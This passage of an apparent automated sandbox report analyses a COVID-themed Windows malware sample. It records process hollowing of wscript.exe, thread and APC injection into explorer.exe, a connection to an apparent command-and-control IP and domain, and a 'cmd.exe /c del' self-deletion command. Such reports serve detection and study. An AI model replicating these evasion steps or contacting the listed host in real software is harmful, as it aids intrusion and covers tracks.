          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DBAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DDFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E5B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04E34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 19_2_04DAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wscript.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exe | Domain query: www.portablesteamsaunas.com
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Memory written: C:\Users\user\Desktop\COVID-19-Related Requirements.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\wscript.exe | Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: E20000
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Process created: C:\Users\user\Desktop\COVID-19-Related Requirements.exe {path}
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\COVID-19-Related Requirements.exe'
          Source: explorer.exe, 00000010.00000002.610856927.0000000004F80000.00000004.00000001.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000010.00000000.435313818.00000000008B8000.00000004.00000020.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000010.00000002.598251507.0000000000EE0000.00000002.00000001.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
          Source: explorer.exe, 00000010.00000002.598251507.0000000000EE0000.00000002.00000001.sdmp, wscript.exe, 00000013.00000002.598056801.0000000003630000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Users\user\Desktop\COVID-19-Related Requirements.exe VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
